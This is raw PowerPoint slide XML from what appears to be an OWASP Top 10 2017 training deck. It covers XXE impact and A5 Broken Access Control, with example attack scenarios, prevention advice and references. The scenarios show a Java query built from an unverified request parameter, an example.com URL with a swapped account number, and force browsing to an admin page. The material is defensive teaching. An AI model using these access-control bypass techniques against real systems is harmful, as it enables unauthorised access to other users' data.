                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>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0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="OpenSymbo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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Technical</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>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lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Attackers who can access web pages or web services, particularly SOAP web services, that process XML. </a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Penetration testers should be capable of exploiting XXE once trained. DAST tools require additional manual steps to exploit this issue. </a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:latin typeface="Arial"/>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lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>By default, many older XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>SAST tools can discover this issue by inspecting dependencies and configuration.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>These flaws can be used to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, and other attacks. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>The business impact depends on the protection needs of all affected applications and data.</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2630728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Example Attack Scenarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: The application uses unverified data in a SQL call that is accessing account information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pstmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("acct"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> results = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pstmt.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>( );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An attacker simply modifies the 'acct' parameter in the browser to send whatever account number they want. If not properly verified, the attacker can access any user's account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/app/accountInfo?acct=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>notmyacct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:  An attacker simply force browses to target URLs. Admin rights are required for access to the admin page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin_getappInfo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If an unauthenticated user can access either page, it’s a flaw. If a non-admin can access the admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>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rPr>
              <a:t>page, this is a flaw.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRP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Broken Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification or destruction of all data, or performing a business function outside of the limits of the user. Common access control vulnerabilities include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-8280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Bypassing access control checks by modifying the URL, internal app state, or the HTML page, or simply using a custom API attack tool.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-8280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Allowing the primary key to be changed to another's users record, such as viewing or editing someone else's account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-8280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Elevation of privilege. Acting as a user without being logged in, or acting as an admin when logged in as a user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-8280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Metadata manipulation, such as replaying or tampering with a JWT access control token or a cookie or hidden field manipulated to elevate privileges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-8280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CORS misconfiguration allows unauthorized API access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-8280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Force browsing to authenticated pages as an unauthenticated user, or to privileged pages as a standard user or API not enforcing access controls for POST, PUT and DELETE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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5"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls - Access Controls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6"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard - V4 Access Control</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7"/>
              </a:rPr>
              <a:t>OWASP Testing Guide - Access Control</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8"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet - Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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9"/>
              </a:rPr>
              <a:t>CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</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0"/>
              </a:rPr>
              <a:t>CWE-284: Improper Access Control (Authorization)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1"/>
              </a:rPr>
              <a:t>CWE-285: Improper Authorization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2"/>
              </a:rPr>
              <a:t>CWE-639: Authorization Bypass Through User-Controlled Key</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a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Access control is only effective if enforced in trusted server-side code or server-less API, where the attacker cannot modify the access control check or metadata.</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With the exception of public resources, deny by default.</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Implement access control mechanisms once and re-use them throughout the application.</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Model access controls should enforce record ownership, rather than accepting that the user can create, read, update or delete any record.</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Domain access controls are unique to each application, but business limit requirements should be enforced by domain models</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Disable web server directory listing, and ensure file metadata such (e.g. .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) is not present within web roots</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Log access control failures, alert admins when appropriate (e.g. repeated failures)</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Rate limiting API and controller access to minimize the harm from automated attack tooling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Developers and QA staff should include functional access control unit and integration tests.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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A5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Broken </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4008829776"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:cs typeface="Arial"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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0">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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
